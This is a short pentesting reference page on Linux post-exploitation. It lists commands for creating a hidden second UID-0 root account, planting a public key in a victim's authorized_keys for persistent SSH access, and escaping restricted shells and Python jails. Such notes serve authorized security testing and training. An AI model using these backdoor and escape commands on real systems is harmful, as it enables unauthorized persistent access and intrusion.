# Linux

## Introduction

This section collects useful commands for the post-exploitation phase on Linux systems.

## User

### Creating a user

```bash
sudo useradd [-m] <USERNAME>
```

### Add a user to a group

```bash
sudo usermod -aG <GROUP> <USERNAME>
```

### Create an alternative root user

```bash
useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>
```

## Login through SSH

Sometimes we have a remote terminal as a user and want SSH access as that user, but **we do not know** their **password**. SSH keys are used in these cases.

1. Generate an SSH key pair.

```bash
kali@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]
```

2. Add the public key to the victim's `~/.ssh/authorized_keys` file:

```bash
echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
```

3. Log in.

```bash
ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>
```

## Shell Escapes

You may have obtained access to a restricted shell that allows only a minimal set of commands and prevents you from accessing other directories or files.

In this section, you will find some ways to escape those restricted shells.

### SSH

```bash
ssh <USERNAME>@<TARGET_IP> -t "bash --noprofile -i"
```

### Python Jail

```bash
echo os.system('/bin/bash')
```

For more examples of how to escape restricted shells, read the following articles.

* [rbash escape | rbash restricted shell escape](https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/)
* [Escaping Restricted Linux Shells](https://www.sans.org/blog/escaping-restricted-linux-shells/)
* [Escaping python jails](https://anee.me/escaping-python-jails-849c65cf306e)
